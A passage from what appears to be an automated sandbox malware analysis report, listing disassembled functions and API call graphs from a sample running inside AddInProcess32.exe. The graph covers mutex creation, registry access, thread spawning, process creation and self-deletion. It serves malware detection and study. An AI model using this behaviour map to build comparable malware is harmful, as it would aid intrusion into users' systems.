                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$lstrcat
                                                                                                  • String ID:
                                                                                                  • API String ID: 493641738-0
                                                                                                  • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                  • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                  • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                  • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                  Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 100091D0
                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                  • _free.LIBCMT ref: 100091E2
                                                                                                  • _free.LIBCMT ref: 100091F4
                                                                                                  • _free.LIBCMT ref: 10009206
                                                                                                  • _free.LIBCMT ref: 10009218
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                  • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                  • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                  • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                  Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 1000536F
                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                  • _free.LIBCMT ref: 10005381
                                                                                                  • _free.LIBCMT ref: 10005394
                                                                                                  • _free.LIBCMT ref: 100053A5
                                                                                                  • _free.LIBCMT ref: 100053B6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                  • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                  • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                  • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                  Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 10004C1D
                                                                                                  • _free.LIBCMT ref: 10004CE8
                                                                                                  • _free.LIBCMT ref: 10004CF2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$FileModuleName
                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  • API String ID: 2506810119-760905667
                                                                                                  • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                  • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                  • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                  • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                  Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                  • __freea.LIBCMT ref: 100087D5
                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                  • String ID:
                                                                                                  • API String ID: 2652629310-0
                                                                                                  • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                  • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                  • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                  • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                  Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                  • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3177248105-0
                                                                                                  • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                  • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                  • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                  • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                  Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strlen
                                                                                                  • String ID: : $Se.
                                                                                                  • API String ID: 4218353326-4089948878
                                                                                                  • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                  • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                  • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                  • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                  Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                    • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                  • String ID: Unknown exception
                                                                                                  • API String ID: 3476068407-410509341
                                                                                                  • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                  • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                  • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                  • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.1%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:2.3%
                                                                                                  Total number of Nodes:517
                                                                                                  Total number of Limit Nodes:8
                                                                                                  execution_graph 46472 404e26 WaitForSingleObject 46473 404e40 SetEvent CloseHandle 46472->46473 46474 404e57 closesocket 46472->46474 46475 404ed8 46473->46475 46476 404e64 46474->46476 46477 404e7a 46476->46477 46485 4050e4 83 API calls 46476->46485 46479 404e8c WaitForSingleObject 46477->46479 46480 404ece SetEvent CloseHandle 46477->46480 46486 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46479->46486 46480->46475 46482 404e9b SetEvent WaitForSingleObject 46487 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46482->46487 46484 404eb3 SetEvent CloseHandle CloseHandle 46484->46480 46485->46477 46486->46482 46487->46484 46488 434918 46489 434924 ___FrameUnwindToState 46488->46489 46514 434627 46489->46514 46491 43492b 46493 434954 46491->46493 46809 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 46491->46809 46499 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46493->46499 46810 4442d2 5 API calls ___crtLCMapStringA 46493->46810 46495 43496d 46513 434973 ___FrameUnwindToState 46495->46513 46811 444276 5 API calls ___crtLCMapStringA 46495->46811 46497 4349f3 46525 434ba5 46497->46525 46499->46497 46812 443487 35 API calls 5 library calls 46499->46812 46508 434a1f 46510 434a28 46508->46510 46813 443462 28 API calls _Atexit 46508->46813 46814 43479e 13 API calls 2 library calls 46510->46814 46515 434630 46514->46515 46815 434cb6 IsProcessorFeaturePresent 46515->46815 46517 43463c 46816 438fb1 10 API calls 4 library calls 46517->46816 46519 434641 46524 434645 46519->46524 46817 44415f 46519->46817 46522 43465c 46522->46491 46524->46491 46883 436f10 46525->46883 46528 4349f9 46529 444223 46528->46529 46885 44f0d9 46529->46885 46531 44422c 46532 434a02 46531->46532 46889 446895 35 API calls 46531->46889 46534 40ea00 46532->46534 46891 41cbe1 LoadLibraryA GetProcAddress 46534->46891 46536 40ea1c GetModuleFileNameW 46896 40f3fe 46536->46896 46538 40ea38 46911 4020f6 46538->46911 46541 4020f6 28 API calls 46542 40ea56 46541->46542 46917 41beac 46542->46917 46546 40ea68 46943 401e8d 46546->46943 46548 40ea71 46549 40ea84 46548->46549 46550 40eace 46548->46550 46973 40fbee 95 API calls 46549->46973 46949 401e65 22 API calls 46550->46949 46553 40ea96 46974 401e65 22 API calls 46553->46974 46554 40eade 46950 401e65 22 API calls 46554->46950 46556 40eaa2 46975 410f72 36 API calls __EH_prolog 46556->46975 46558 40eafd 46951 40531e 28 API calls 46558->46951 46561 40eb0c 46952 406383 28 API calls 46561->46952 46562 40eab4 46976 40fb9f 77 API calls 46562->46976 46565 40eb18 46953 401fe2 46565->46953 46566 40eabd 46977 40f3eb 70 API calls 46566->46977 46570 40eac6 46573 401fd8 11 API calls 46570->46573 46575 40ef36 46573->46575 46574 401fd8 11 API calls 46576 40eb36 46574->46576 46804 443396 GetModuleHandleW 46575->46804 46965 401e65 22 API calls 46576->46965 46578 40eb3f 46966 401fc0 28 API calls 46578->46966 46580 40eb4a 46967 401e65 22 API calls 46580->46967 46582 40eb63 46968 401e65 22 API calls 46582->46968 46584 40eb7e 46585 40ebe9 46584->46585 46978 406c59 28 API calls 46584->46978 46969 401e65 22 API calls 46585->46969 46588 40ebab 46589 401fe2 28 API calls 46588->46589 46590 40ebb7 46589->46590 46591 401fd8 11 API calls 46590->46591 46595 40ebc0 46591->46595 46593 40ec43 46593->46570 46982 41b354 33 API calls 46593->46982 46594 40ebf6 46605 40ec3d 46594->46605 46980 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 46594->46980 46979 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 46595->46979 46598 40ebdf 46598->46585 46600 40f38a 46598->46600 47060 4139e4 30 API calls 46600->47060 46601 40ec5e 46604 40ecb1 46601->46604 46983 407751 RegOpenKeyExA RegQueryValueExA RegCloseKey 46601->46983 46602 40ec21 46602->46605 46981 4139e4 30 API calls 46602->46981 46988 401e65 22 API calls 46604->46988 46970 40d0a4 46605->46970 46609 40ecba 46618 40ecc6 46609->46618 46619 40eccb 46609->46619 46610 40ec79 46612 40ec87 46610->46612 46613 40ec7d 46610->46613 46611 40f3a0 47061 4124b0 65 API calls ___scrt_get_show_window_mode 46611->47061 46986 401e65 22 API calls 46612->46986 46984 407773 30 API calls 46613->46984 46617 40f388 47062 41bcef 28 API calls 46617->47062 46989 407790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 46618->46989 46990 401e65 22 API calls 46619->46990 46620 40ec82 46985 40729b 97 API calls 46620->46985 46625 40f3ba 47063 413a5e RegOpenKeyExW RegDeleteValueW 46625->47063 46626 40ecd4 46991 41bcef 28 API calls 46626->46991 46628 40ec90 46628->46604 46631 40ecac 46628->46631 46630 40ecdf 46992 401f13 28 API calls 46630->46992 46987 40729b 97 API calls 46631->46987 46632 40f3cd 47064 401f09 11 API calls 46632->47064 46636 40ecea 46993 401f09 11 API calls 46636->46993 46638 40f3d7 47065 401f09 11 API calls 46638->47065 46639 40ecf3 46994 401e65 22 API calls 46639->46994 46642 40f3e0 47066 40dd7d 27 API calls 46642->47066 46643 40ecfc 46995 401e65 22 API calls 46643->46995 46645 40f3e5 47067 414f65 167 API calls 46645->47067 46649 40ed16 46996 401e65 22 API calls 46649->46996 46651 40ed30 46997 401e65 22 API calls 46651->46997 46653 40ed49 46654 40edbb 46653->46654 46998 401e65 22 API calls 46653->46998 46656 40edc5 46654->46656 46661 40ef41 ___scrt_get_show_window_mode 46654->46661 46657 40edce 46656->46657 46664 40ee4a 46656->46664 47004 401e65 22 API calls 46657->47004 46659 40edd7 47005 401e65 22 API calls 46659->47005 46660 40ed5e _wcslen 46660->46654 46999 401e65 22 API calls 46660->46999 47015 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 46661->47015 46663 40ede9 47006 401e65 22 API calls 46663->47006 46687 40ee45 ___scrt_get_show_window_mode 46664->46687 46666 40ed79 47000 401e65 22 API calls 46666->47000 46669 40edfb 47007 401e65 22 API calls 46669->47007 46671 40ed8e 47001 40da6f 31 API calls 46671->47001 46672 40ef8c 47016 401e65 22 API calls 46672->47016 46676 40ee24 47008 401e65 22 API calls 46676->47008 46677 40efb1 47017 402093 28 API calls 46677->47017 46678 40eda1 47002 401f13 28 API calls 46678->47002 46680 40edad 47003 401f09 11 API calls 46680->47003 46683 40efc3 47018 4137aa 14 API calls 46683->47018 46685 40ee35 47009 40ce34 45 API calls _wcslen 46685->47009 46686 40edb6 46686->46654 46687->46664 47010 413982 31 API calls 46687->47010 46691 40efd9 47019 401e65 22 API calls 46691->47019 46692 40eede ctype 47011 401e65 22 API calls 46692->47011 46694 40efe5 47020 43bb2c 39 API calls _swprintf 46694->47020 46697 40eff2 46699 40f01f 46697->46699 47021 41ce2c 86 API calls ___scrt_get_show_window_mode 46697->47021 46698 40eef5 46698->46672 47012 401e65 22 API calls 46698->47012 47022 402093 28 API calls 46699->47022 46701 40ef12 47013 41bcef 28 API calls 46701->47013 46705 40f003 CreateThread 46705->46699 47137 41d4ee 10 API calls 46705->47137 46706 40f034 47023 402093 28 API calls 46706->47023 46707 40ef1e 47014 40f4af 103 API calls 46707->47014 46710 40f043 47024 41b580 79 API calls 46710->47024 46711 40ef23 46711->46672 46713 40ef2a 46711->46713 46713->46570 46714 40f048 47025 401e65 22 API calls 46714->47025 46716 40f054 47026 401e65 22 API calls 46716->47026 46718 40f066 47027 401e65 22 API calls 46718->47027 46720 40f086 47028 43bb2c 39 API calls _swprintf 46720->47028 46722 40f093 47029 401e65 22 API calls 46722->47029 46724 40f09e 47030 401e65 22 API calls 46724->47030 46726 40f0af 47031 401e65 22 API calls 46726->47031 46728 40f0c4 47032 401e65 22 API calls 46728->47032 46730 40f0d5 46731 40f0dc StrToIntA 46730->46731 47033 409e1f 169 API calls _wcslen 46731->47033 46733 40f0ee 47034 401e65 22 API calls 46733->47034 46735 40f0f7 46736 40f13c 46735->46736 47035 43455e 22 API calls 3 library calls 46735->47035 47037 401e65 22 API calls 46736->47037 46739 40f10c 47036 401e65 22 API calls 46739->47036 46741 40f11f 46742 40f126 CreateThread 46741->46742 46742->46736 47138 41a045 102 API calls __EH_prolog 46742->47138 46743 40f194 47040 401e65 22 API calls 46743->47040 46744 40f14c 46744->46743 47038 43455e 22 API calls 3 library calls 46744->47038 46747 40f161 47039 401e65 22 API calls 46747->47039 46749 40f173 46752 40f17a CreateThread 46749->46752 46750 40f207 47046 401e65 22 API calls 46750->47046 46751 40f19d 46751->46750 47041 401e65 22 API calls 46751->47041 46752->46743 47136 41a045 102 API calls __EH_prolog 46752->47136 46755 40f1b9 47042 401e65 22 API calls 46755->47042 46756 40f255 47051 41b69e 79 API calls 46756->47051 46757 40f210 46757->46756 47047 401e65 22 API calls 46757->47047 46761 40f1ce 47043 40da23 31 API calls 46761->47043 46762 40f25e 47052 401f13 28 API calls 46762->47052 46763 40f225 47048 401e65 22 API calls 46763->47048 46765 40f269 47053 401f09 11 API calls 46765->47053 46767 40f1e1 47044 401f13 28 API calls 46767->47044 46770 40f23a 47049 43bb2c 39 API calls _swprintf 46770->47049 46772 40f272 CreateThread 46775 40f293 CreateThread 46772->46775 46776 40f29f 46772->46776 47139 40f7e2 120 API calls 46772->47139 46773 40f1ed 47045 401f09 11 API calls 46773->47045 46775->46776 47140 412132 137 API calls 46775->47140 46778 40f2b4 46776->46778 46779 40f2a8 CreateThread 46776->46779 46783 40f307 46778->46783 47054 402093 28 API calls 46778->47054 46779->46778 47141 412716 38 API calls ___scrt_get_show_window_mode 46779->47141 46781 40f1f6 CreateThread 46781->46750 47142 401a6d 49 API calls 46781->47142 46782 40f247 47050 40c19d 7 API calls 46782->47050 47056 41353a RegOpenKeyExA RegQueryValueExA RegCloseKey 46783->47056 46786 40f2d7 47055 4052fd 28 API calls 46786->47055 46789 40f31f 46789->46642 47057 41bcef 28 API calls 46789->47057 46794 40f338 47058 413656 31 API calls 46794->47058 46799 40f34e 47059 401f09 11 API calls 46799->47059 46801 40f381 DeleteFileW 46801->46617 46802 40f359 46801->46802 46802->46617 46802->46801 46803 40f36f Sleep 46802->46803 46803->46802 46805 434a15 46804->46805 46805->46508 46806 4434bf 46805->46806 47144 44323c 46806->47144 46809->46491 46810->46495 46811->46499 46812->46497 46813->46510 46814->46513 46815->46517 46816->46519 46821 44fbe8 46817->46821 46820 438fda 8 API calls 3 library calls 46820->46524 46824 44fc05 46821->46824 46825 44fc01 46821->46825 46823 43464e 46823->46522 46823->46820 46824->46825 46827 449d26 46824->46827 46839 43502b 46825->46839 46828 449d32 ___FrameUnwindToState 46827->46828 46846 445909 EnterCriticalSection 46828->46846 46830 449d39 46847 450203 46830->46847 46832 449d48 46833 449d57 46832->46833 46858 449bba 23 API calls 46832->46858 46860 449d73 LeaveCriticalSection std::_Lockit::~_Lockit 46833->46860 46836 449d52 46859 449c70 GetStdHandle GetFileType 46836->46859 46838 449d68 ___FrameUnwindToState 46838->46824 46840 435036 IsProcessorFeaturePresent 46839->46840 46841 435034 46839->46841 46843 435078 46840->46843 46841->46823 46882 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46843->46882 46845 43515b 46845->46823 46846->46830 46848 45020f ___FrameUnwindToState 46847->46848 46849 450233 46848->46849 46850 45021c 46848->46850 46861 445909 EnterCriticalSection 46849->46861 46869 44062d 20 API calls _free 46850->46869 46853 450221 pre_c_initialization ___FrameUnwindToState 46853->46832 46854 45023f 46857 45026b 46854->46857 46862 450154 46854->46862 46870 450292 LeaveCriticalSection std::_Lockit::~_Lockit 46857->46870 46858->46836 46859->46833 46860->46838 46861->46854 46871 445b74 46862->46871 46864 450166 46868 450173 46864->46868 46878 448b04 11 API calls 2 library calls 46864->46878 46867 4501c5 46867->46854 46879 446802 20 API calls _free 46868->46879 46869->46853 46870->46853 46876 445b81 ___crtLCMapStringA 46871->46876 46872 445bc1 46881 44062d 20 API calls _free 46872->46881 46873 445bac RtlAllocateHeap 46874 445bbf 46873->46874 46873->46876 46874->46864 46876->46872 46876->46873 46880 443001 7 API calls 2 library calls 46876->46880 46878->46864 46879->46867 46880->46876 46881->46874 46882->46845 46884 434bb8 GetStartupInfoW 46883->46884 46884->46528 46886 44f0eb 46885->46886 46887 44f0e2 46885->46887 46886->46531 46890 44efd8 48 API calls 4 library calls 46887->46890 46889->46531 46890->46886 46892 41cc20 LoadLibraryA GetProcAddress 46891->46892 46893 41cc10 GetModuleHandleA GetProcAddress 46891->46893 46894 41cc49 44 API calls 46892->46894 46895 41cc39 LoadLibraryA GetProcAddress 46892->46895 46893->46892 46894->46536 46895->46894 47068 41b539 FindResourceA 46896->47068 46900 40f428 ctype 47078 4020b7 46900->47078 46903 401fe2 28 API calls 46904 40f44e 46903->46904 46905 401fd8 11 API calls 46904->46905 46906 40f457 46905->46906 46907 43bda0 _Yarn 21 API calls 46906->46907 46908 40f468 ctype 46907->46908 47084 406e13 46908->47084 46910 40f49b 46910->46538 46912 40210c 46911->46912 46913 4023ce 11 API calls 46912->46913 46914 402126 46913->46914 46915 402569 28 API calls 46914->46915 46916 402134 46915->46916 46916->46541 47121 4020df 46917->47121 46919 41bf2f 46920 401fd8 11 API calls 46919->46920 46921 41bf61 46920->46921 46923 401fd8 11 API calls 46921->46923 46922 41bf31 47127 4041a2 28 API calls 46922->47127 46926 41bf69 46923->46926 46928 401fd8 11 API calls 46926->46928 46927 41bf3d 46930 401fe2 28 API calls 46927->46930 46929 40ea5f 46928->46929 46939 40fb52 46929->46939 46932 41bf46 46930->46932 46931 401fe2 28 API calls 46938 41bebf 46931->46938 46933 401fd8 11 API calls 46932->46933 46935 41bf4e 46933->46935 46934 401fd8 11 API calls 46934->46938 47128 41cec5 28 API calls 46935->47128 46938->46919 46938->46922 46938->46931 46938->46934 47125 4041a2 28 API calls 46938->47125 47126 41cec5 28 API calls 46938->47126 46940 40fb5e 46939->46940 46942 40fb65 46939->46942 47129 402163 11 API calls 46940->47129 46942->46546 46944 402163 46943->46944 46945 40219f 46944->46945 47130 402730 11 API calls 46944->47130 46945->46548 46947 402184 47131 402712 11 API calls std::_Deallocate 46947->47131 46949->46554 46950->46558 46951->46561 46952->46565 46954 401ff1 46953->46954 46955 402039 46953->46955 46956 4023ce 11 API calls 46954->46956 46962 401fd8 46955->46962 46957 401ffa 46956->46957 46958 40203c 46957->46958 46959 402015 46957->46959 47133 40267a 11 API calls 46958->47133 47132 403098 28 API calls 46959->47132 46963 4023ce 11 API calls 46962->46963 46964 401fe1 46963->46964 46964->46574 46965->46578 46966->46580 46967->46582 46968->46584 46969->46594 47134 401fab 46970->47134 46972 40d0ae CreateMutexA GetLastError 46972->46593 46973->46553 46974->46556 46975->46562 46976->46566 46978->46588 46979->46598 46980->46602 46981->46605 46982->46601 46983->46610 46984->46620 46985->46612 46986->46628 46987->46604 46988->46609 46989->46619 46990->46626 46991->46630 46992->46636 46993->46639 46994->46643 46995->46649 46996->46651 46997->46653 46998->46660 46999->46666 47000->46671 47001->46678 47002->46680 47003->46686 47004->46659 47005->46663 47006->46669 47007->46676 47008->46685 47009->46687 47010->46692 47011->46698 47012->46701 47013->46707 47014->46711 47015->46672 47016->46677 47017->46683 47018->46691 47019->46694 47020->46697 47021->46705 47022->46706 47023->46710 47024->46714 47025->46716 47026->46718 47027->46720 47028->46722 47029->46724 47030->46726 47031->46728 47032->46730 47033->46733 47034->46735 47035->46739 47036->46741 47037->46744 47038->46747 47039->46749 47040->46751 47041->46755 47042->46761 47043->46767 47044->46773 47045->46781 47046->46757 47047->46763 47048->46770 47049->46782 47050->46756 47051->46762 47052->46765 47053->46772 47054->46786 47056->46789 47057->46794 47058->46799 47059->46802 47060->46611 47062->46625 47063->46632 47064->46638 47065->46642 47066->46645 47135 41ada8 104 API calls 47067->47135 47069 41b556 LoadResource LockResource SizeofResource 47068->47069 47070 40f419 47068->47070 47069->47070 47071 43bda0 47070->47071 47077 4461b8 ___crtLCMapStringA 47071->47077 47072 